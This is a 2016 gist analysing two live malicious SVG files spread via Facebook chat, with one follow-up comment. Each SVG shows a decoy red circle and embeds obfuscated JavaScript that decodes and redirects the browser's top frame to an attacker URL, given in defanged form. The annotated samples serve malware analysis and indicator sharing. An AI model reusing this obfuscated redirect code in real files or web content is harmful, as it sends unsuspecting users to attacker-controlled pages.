@balaziks
Created November 20, 2016 22:24
Malicious code samples distributed via Facebook chat, hidden inside SVG files (the originals carried no .js extension). The visible image is only a decoy red circle; the embedded <script> runs when the SVG is opened as a document in a browser (scripts do not run when an SVG is embedded via <img>), decodes the property names "top", "location", "href" plus a URL, and sets window.top.location.href to it. Running the decoders on the literals below, the two samples redirect to hxxp://esayizuke[.]itup[.]pw/php/trust.php and hxxp://mourid[.]com/php/trust.php — different hosts, same /php/trust.php path. Treat these as live malware samples: analyse in an isolated environment and do not open them locally.
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<circle cx="250" cy="250" r="50" fill="red" />
<script type="text/javascript"><![CDATA[
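/**
 * Stage-1 string decoder of this dropper: a polyalphabetic substitution
 * cipher over a fixed 64-symbol alphabet, followed by dropping a junk prefix.
 *
 * For the character at position i of `fxyyj`:
 *   - if it is not in the base alphabet `base` (the alphabet omits q, w, Q, W
 *     and everything outside its 64 symbols) it is copied through unchanged;
 *   - otherwise its index in the shuffled alphabet `tables[i % tables.length]`
 *     is looked up and the base-alphabet symbol at that index is emitted.
 * The first `cpnzo` characters of the result are then discarded.
 *
 * In this sample the call sites decode to "top", "location", "href" and the
 * redirect target hxxp://esayizuke[.]itup[.]pw/php/trust.php (defanged).
 *
 * @param {string} fxyyj   obfuscated input
 * @param {number} cpnzo   number of leading decoded characters to drop (>= 0)
 * @param {*}      gparii  unused; every call site passes a boolean, presumably
 *                         noise to defeat signature matching
 * @returns {string} decoded text
 *
 * Changes vs. the original: the prefix-dropping loop used an undeclared
 * counter (implicit global), which throws a ReferenceError in strict mode /
 * ES modules; the hand-rolled linear scans are replaced with indexOf; a symbol
 * that is in `base` but missing from the cycled table now passes through
 * instead of appending the text "undefined".
 */
function pmlna(fxyyj, cpnzo, gparii) {
  var base = "y8Le2O5m.F0CDTh1HEUY=VzjPbNAgdu:sloG7BaZMn4?3cXxpfIKRSt/kir9_Jv6";
  // Seven permutations of `base`; which one applies depends on the position.
  var tables = ["VK6xe1pYhuDmE4fHTXZj\/v8S.3GRBsaL=MCIAyctOknz_72F5No:iPd9gJ0r?bUl","5o.s\/9nlAf7y8Zk2_64LIHSiVbXcaKejURNPDOp0uvEF:TmxCMrg=t31?hBYzdGJ","tT3L\/YVr=RAhkzBPndOpuy?a_bN9mFcKo4J5GxX28:i6UEIZ1fgMDHl.sSv7e0Cj","E.Vpb_zJceBylvt\/2SOFi4khT?N96A5D3aMjK1CH:uRLgGI=Ufo8X7msZdnPYr0x","dDU0s:VMjPeiGNf8lK=Zu_?nX35rkyL9HYotJcRA1\/.4hvOImaBpT76CbxgSEz2F","Tf4CSh2Hvu3g98LBKbx1N.\/YAIrcz75_meXRyVlEasOkPMUipZGoJ?6Fnt=j0Dd:","HmbxLl=hF1t2S5M.Y7g6nEVPpouiX?zA4v3aC_NRBkT\/e:IcG9sDfUZjrKy0Jd8O"];
  var decoded = "";
  for (var i = 0; i < fxyyj.length; i++) {
    var ch = fxyyj[i];
    if (base.indexOf(ch) < 0) {
      // Outside the alphabet: pass through verbatim (this is how 'w' in ".pw" survives).
      decoded += ch;
      continue;
    }
    var pos = tables[i % tables.length].indexOf(ch);
    // The tables are permutations of `base`, so pos should always be >= 0;
    // fall back to the raw character rather than emit garbage.
    decoded += pos >= 0 ? base[pos] : ch;
  }
  // Drop the junk prefix; substring() clamps a negative or NaN start to 0.
  return decoded.substring(cpnzo);
}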
// Stage 2: decode the property path and the destination, then navigate.
// Running pmlna() on the literals below yields "top", "location", "href" and
// the redirect target hxxp://esayizuke[.]itup[.]pw/php/trust.php (defanged IOC).
// The bracketed access is equivalent to
//   window.top.location.href = "<attacker URL>";
// so as soon as a browser loads this SVG as a document the victim's top frame is
// redirected to the attacker's page; the <circle> above is the only visible content.
var win = window;
var frameName = pmlna("NBlMm", 2, true);                // "top"
var navName = pmlna("cUqnHzxd?tMHmvCTXmxXk", 13, false);  // "location"
var targetName = pmlna("=RFAaecVpm?YeZfBLf", 14, false);  // "href"
win[frameName][navName][targetName] = pmlna("dpla6LZdCKsCC4c5SkLnxhhl5mvGw11tmFZ0eomjpM5", 5, true);
]]></script>
</svg>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<circle cx="250" cy="250" r="50" fill="red" />
<script type="text/javascript"><![CDATA[
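/**
 * Stage-1 string decoder of the second sample: the same polyalphabetic
 * substitution scheme as the first file, with a different base alphabet and
 * four (instead of seven) shuffled tables, followed by dropping a junk prefix.
 *
 * For the character at position i of `ybccht`:
 *   - if it is not in the base alphabet `base` (the alphabet omits q, w, Q, W
 *     and everything outside its 64 symbols) it is copied through unchanged;
 *   - otherwise its index in `tables[i % tables.length]` is looked up and the
 *     base-alphabet symbol at that index is emitted.
 * The first `kwwxkt` characters of the result are then discarded.
 *
 * In this sample the call sites decode to "top", "location", "href" and the
 * redirect target hxxp://mourid[.]com/php/trust.php (defanged).
 *
 * @param {string} ybccht  obfuscated input
 * @param {number} kwwxkt  number of leading decoded characters to drop (>= 0)
 * @param {*}      mvvdaz  unused; every call site passes a boolean, presumably
 *                         noise to defeat signature matching
 * @returns {string} decoded text
 *
 * Changes vs. the original: the prefix-dropping loop used an undeclared
 * counter (implicit global), which throws a ReferenceError in strict mode /
 * ES modules; the hand-rolled linear scans are replaced with indexOf; a symbol
 * that is in `base` but missing from the cycled table now passes through
 * instead of appending the text "undefined".
 */
function vpqhf(ybccht, kwwxkt, mvvdaz) {
  var base = "4Nh3UEHc:beVMIS_0PuDCgl6OfFpTrK97zRBk=.YsL5XydtomAGn1jJ8v/?xiZa2";
  // Four permutations of `base`; which one applies depends on the position.
  var tables = ["9Mr1EaBNGdl3c2kTUh?yviD5P\/x8Zf_s6L7ptbJV0IKu=YC4AnjzHO:XFSRgemo.","E96VFK4mU:R?MAdz0e5iYBg32fnhXupH_Ps8JalNjrx=LZcDyoGSt\/v7IC1kb.TO","MV6Js9SY0xOU8ThNjvzkLl5DXoPyE7m:b4Ku.t2C3Bc1Hne?r=G\/pIi_FgaZRdfA","U0for4hFsRtOLMdAb1cC5aeXHBK.IPvpT2YV6xEkN7yl\/GZzj:n8?Sigu3Jm=9D_"];
  var decoded = "";
  for (var i = 0; i < ybccht.length; i++) {
    var ch = ybccht[i];
    if (base.indexOf(ch) < 0) {
      // Outside the alphabet: pass through verbatim.
      decoded += ch;
      continue;
    }
    var pos = tables[i % tables.length].indexOf(ch);
    // The tables are permutations of `base`, so pos should always be >= 0;
    // fall back to the raw character rather than emit garbage.
    decoded += pos >= 0 ? base[pos] : ch;
  }
  // Drop the junk prefix; substring() clamps a negative or NaN start to 0.
  return decoded.substring(kwwxkt);
}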
// Stage 2: decode the property path and the destination, then navigate.
// Running vpqhf() on the literals below yields "top", "location", "href" and
// the redirect target hxxp://mourid[.]com/php/trust.php (defanged IOC) — a
// different host from the first sample, same /php/trust.php path.
// The bracketed access is equivalent to
//   window.top.location.href = "<attacker URL>";
// so as soon as a browser loads this SVG as a document the victim's top frame is
// redirected to the attacker's page; the <circle> above is the only visible content.
var win = window;
var frameName = vpqhf("q6yeCDy", 4, true);              // "top"
var navName = vpqhf("fw5t/uzFNL5zNTe=4S", 10, false);     // "location"
var targetName = vpqhf("w5xRYuotruOB", 8, false);         // "href"
win[frameName][navName][targetName] = vpqhf("/b6ZCh03Sy?cfbnENDr386y3CuzNClyf8", 2, false);
]]></script>
</svg>

Muph0 commented Nov 20, 2016

I received this one http://pastebin.com/ssyfbfam

I'd say the code is re-obfuscated every time the malware spreads, but the payload — a redirect to a `/php/trust.php` URL, in my sample hxxp://egemepunel[.]itup[.]pw/php/trust.php (defanged) — stays the same; the host name appears to vary between samples while the path does not.
